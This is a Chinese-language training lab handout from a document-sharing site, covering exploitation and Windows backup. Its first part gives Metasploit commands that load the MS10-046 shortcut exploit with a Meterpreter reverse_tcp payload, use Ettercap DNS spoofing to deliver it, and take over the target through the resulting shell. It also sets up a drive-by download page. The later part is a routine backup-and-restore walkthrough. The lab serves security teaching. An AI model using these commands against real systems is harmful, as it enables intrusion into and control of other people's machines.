


下載本文檔
版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
1、無(wú)利用漏洞進(jìn)行溢出攻擊及數(shù)據(jù)備份利用漏洞進(jìn)行溢出攻擊及數(shù)據(jù)備份1.1. 實(shí)訓(xùn)目的實(shí)訓(xùn)目的( (后果自負(fù)后果自負(fù)) )利用系統(tǒng)漏洞進(jìn)行溢出攻擊是一種現(xiàn)今網(wǎng)絡(luò)上常用的一種攻擊手段,它利用 C 等高級(jí)語(yǔ)言對(duì)于數(shù)據(jù)、指針以及寄存器等保護(hù)不足及程序員在開(kāi)發(fā)系統(tǒng)時(shí)的過(guò)錯(cuò),通過(guò)多重手段屏蔽用戶感知,從而獲取用戶所傳遞信息或者誤導(dǎo)用戶的網(wǎng)絡(luò)應(yīng)用操作。 本次練習(xí)主要目的是體驗(yàn)利用漏洞進(jìn)行緩沖區(qū)溢出攻擊。數(shù)據(jù)備份是系統(tǒng)管理員日常進(jìn)行系統(tǒng)、數(shù)據(jù)維護(hù)所必需掌握的技巧及手段,本次練習(xí)應(yīng)用 windows2003 自帶的備份工具進(jìn)行數(shù)據(jù)備份。2.2. 實(shí)訓(xùn)所需條件及環(huán)境實(shí)訓(xùn)所需條件及環(huán)境硬件設(shè)備:硬件設(shè)備:局域網(wǎng)(含機(jī)柜
2、、配線架、交換機(jī)等) 、臺(tái)式 PC 機(jī)軟件支撐:軟件支撐:Windows 2003、Windows XP 以及 BackTract5 虛擬機(jī)網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu):網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu):3.3. 實(shí)訓(xùn)內(nèi)容實(shí)訓(xùn)內(nèi)容3.13.1 利用利用 metasploitmetasploit 進(jìn)行溢出攻擊練習(xí)進(jìn)行溢出攻擊練習(xí)使用 metasploit 開(kāi)啟攻擊無(wú)首先是進(jìn)入 Metasploit??梢渣c(diǎn)擊【應(yīng)用程序】【BackTrack】【Exploitation Tools】【Network Exploitation Tools】【Metasploit Framewrok】進(jìn)入 Metasploit 外,也可以在圖形界面下打開(kāi)
3、任意一個(gè)終端, 直接輸入 msfconsole 命令來(lái)進(jìn)入 Metasploit。此時(shí)可以看到當(dāng)前包含代碼數(shù)量、參數(shù)狀態(tài)及最新版本等,如下圖所示,進(jìn)入 msf 的工作平臺(tái)后,輸入 search ms10-046 查詢攻擊代碼的存放路徑, 即可看到名為ms10_046_shortcut_icon_dllloader的相關(guān)信息。接下來(lái),使用如下指令載入攻擊代碼:Use windows/browser/ms10_046_shortcut_icon_dllloader回車后如下圖所示,表示載入攻擊代碼成功。此時(shí),可以通過(guò) showoptions 來(lái)查看可以(必需)進(jìn)行的參數(shù)配置。無(wú)在了解需進(jìn)行的攻擊參
4、數(shù)的配置后,接下來(lái)就可以使用 set 命令來(lái)依次配置參數(shù)。其中,還需設(shè)置 PAYLOAD 為獲取 windows 的 shellcode,即 windows/metepreter/reverse_tcp。此外,由于后面攻擊還要使用 ettercap 對(duì)目標(biāo)進(jìn)行 DNS 欺騙攻擊,所以要將反彈端口的目的地設(shè)置為自身 IP,即設(shè)置 LHOST 為自身 IP。具體命令如下:setSRVHOST攻擊者自身 IPsetPAYLOADwindows/meterpreter/reverse_tcpsetLHOST攻擊者自身 IPexploit無(wú)進(jìn)行 dns 欺騙攻擊參照在欺騙攻擊練習(xí)中的操作敘述及練習(xí)視頻的
5、說(shuō)明,完成對(duì)etter.dns 的配置。注意這里域名對(duì)應(yīng)的 ip 地址必需根據(jù)自己的機(jī)器的實(shí)際 ip 地址進(jìn)行。完成域名的配置后,使用 ifconfig 查看使用的網(wǎng)絡(luò)適配器的符號(hào),然后發(fā)起欺騙攻擊,如下圖所示。無(wú)入侵目標(biāo)主機(jī)目標(biāo)主機(jī) (Windows XP) 上打開(kāi)瀏覽器, 輸入網(wǎng)址 http:/www.xxx并回車,會(huì)發(fā)現(xiàn)瀏覽器的響應(yīng)會(huì)變得緩慢。稍等數(shù)秒后,會(huì)發(fā)現(xiàn)在目標(biāo)主機(jī)上的瀏覽器上原本應(yīng)顯示為 www.xxx 的主頁(yè), 突然變成了一個(gè)名為30XHJnSkKNjR 的共享目錄。如下圖所示。打開(kāi)攻擊主機(jī) BackTrack5 的 Metasploit 終端下, 會(huì)看
6、到目標(biāo)主機(jī)因DNS 欺騙而導(dǎo)致的重定向訪問(wèn),此時(shí)目標(biāo)主機(jī)被強(qiáng)制運(yùn)行了攻擊主機(jī)即 30 上 Metasploit 執(zhí)行的漏洞攻擊代碼。 于是在成功溢出后,攻擊主機(jī)拿到了一個(gè)反向溢出 Shell。如下圖所示,即可獲無(wú)取到一個(gè) Meterpreter Session(注意倒數(shù)第三行) 。此時(shí),攻擊者輸入 back 命令回到 Metasploit 的根目錄后,就可以使用 sessions 查看這個(gè)反向溢出 Shell 的 ID 號(hào)及其相關(guān)信息, 然后再調(diào)用該 ID 即可。具體命令如下:sessionssessions-i1參數(shù)解釋:-i num 該參數(shù)用于調(diào)用不同 ID 號(hào)的成
7、功溢出 Shell,后跟的 num 為ID 號(hào)。無(wú)依次輸入上述命令,就可以成功調(diào)用該反向溢出 Shell,此時(shí)會(huì)看到提示符從msf變成了meterpreter,如下圖所示,此時(shí)鍵入 ps 即可看到目標(biāo)主機(jī)所有運(yùn)行的進(jìn)程。攻擊操作練習(xí)目標(biāo)主機(jī)打開(kāi)計(jì)算器,如下圖所示,請(qǐng)你使用 linux 的 kill 指令將計(jì)算器的進(jìn)程殺除。使用命令 run getgui e,看看能否開(kāi)啟目標(biāo)主機(jī)的運(yùn)程管理服務(wù)。3.23.2 掛馬攻擊練習(xí)掛馬攻擊練習(xí)無(wú)開(kāi)啟 windows2003,并運(yùn)行 IIS 服務(wù)。然后使用如下指令,設(shè)計(jì)掛馬網(wǎng)頁(yè)。修改3.1中的dns 配置, 將域名對(duì)應(yīng)的ip地址指向windows2003,并
8、重復(fù) 3.1 的整個(gè)攻擊過(guò)程??纯丛谀繕?biāo)機(jī)器上,能否察覺(jué)被攻擊機(jī)入侵的痕跡?3.33.3 數(shù)據(jù)備份練習(xí)數(shù)據(jù)備份練習(xí)實(shí)驗(yàn)環(huán)境準(zhǔn)備啟動(dòng) windows2003(以下簡(jiǎn)稱主機(jī)) ,并配置 IIS 服務(wù)器。然后復(fù)制默認(rèn)網(wǎng)站工作目錄下的所有文件夾及其文件到“D:WebBackUp”目錄下。文件狀態(tài)查詢主機(jī)查詢備份前文件夾(即上面需要進(jìn)行備份的 IIS 默認(rèn)網(wǎng)站文件及文件夾)的狀態(tài)(文件夾中文件數(shù)量、名稱、大小),記錄其狀態(tài)為 S1。文件備份(1) 主機(jī)選擇“開(kāi)始-所有程序-附件-系統(tǒng)工具-備份”菜單項(xiàng),彈出“備份或還原向?qū)А睂?duì)話框,單擊“下一步”按鈕。(2) 主機(jī)選擇“備份文件和設(shè)置(A)”單選按鈕,單
9、擊“下一步”按鈕。(3) 主機(jī)選擇 “讓我選擇要備份的內(nèi)容(L)” 單選按鈕, 單擊 “下無(wú)一步”按鈕。(4) 主機(jī)選擇備份項(xiàng)目為“D:WebBackUp” ,單擊“下一步”按鈕。(5) 主機(jī)選擇備份文件的位置為 “D:” , 備份文件名稱保持默認(rèn),單擊“下一步”按鈕。(6) 主機(jī)單擊“完成”按鈕,開(kāi)始備份操作。(7) 稍等片刻后,完成備份操作。主機(jī)單擊“關(guān)閉”按鈕,關(guān)閉“備份進(jìn)度”對(duì)話框。原始文件刪除主機(jī)刪除“D:WebBackUp”文件夾及其文件。文件還原(1) 主機(jī)雙擊“D:Backup.bkf”文件,彈出“備份或還原向?qū)А睂?duì)話框,單擊“下一步”按鈕。(2) 主機(jī)選擇“還原文件和設(shè)置(R)”單選按鈕,單擊“下一步”按鈕。(3) 主機(jī)勾選要還原的項(xiàng)目為“D:Backup.bkf”,
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 2025年中國(guó)食用菌深加工行業(yè)市場(chǎng)全景評(píng)估及投資戰(zhàn)略研究報(bào)告
- 吉林省減震設(shè)備項(xiàng)目可行性研究報(bào)告
- 中國(guó)車身反光膜行業(yè)市場(chǎng)供需格局調(diào)查報(bào)告
- 中國(guó)糖果PVC包裝盒市場(chǎng)發(fā)展現(xiàn)狀調(diào)查及投資趨勢(shì)前景分析報(bào)告
- 商品混凝土項(xiàng)目可行性研究報(bào)告范文
- 中國(guó)馬齒莧市場(chǎng)運(yùn)營(yíng)態(tài)勢(shì)分析及投資前景預(yù)測(cè)報(bào)告
- 中國(guó)電子萬(wàn)能試驗(yàn)機(jī)市場(chǎng)發(fā)展前景預(yù)測(cè)及投資戰(zhàn)略咨詢報(bào)告
- 2025年中國(guó)執(zhí)行元件行業(yè)市場(chǎng)深度分析及投資戰(zhàn)略研究報(bào)告
- 中國(guó)削皮機(jī)行業(yè)市場(chǎng)全景評(píng)估及發(fā)展戰(zhàn)略規(guī)劃報(bào)告
- 格賓石籠可行性研究報(bào)告
- 2023年湖北省普通高中學(xué)業(yè)水平合格性考試地理試題(原卷版)
- 培訓(xùn)采耳師課件
- 建筑項(xiàng)目的合規(guī)與法律要求
- 玻璃粉生產(chǎn)工藝
- 高處墜落及應(yīng)急救援培訓(xùn)考試試題及答案
- 金川公司社會(huì)招聘考試題
- 高中地理100個(gè)答題模板
- 專利技術(shù)交底書(shū)實(shí)例(一種新型地腳螺栓布置型式)
- 羊水三度污染護(hù)理查房課件
- 汽車維修工時(shí)收費(fèi)標(biāo)準(zhǔn)(二類企業(yè))
- JGT483-2015 巖棉薄抹灰外墻外保溫系統(tǒng)材料
評(píng)論
0/150
提交評(píng)論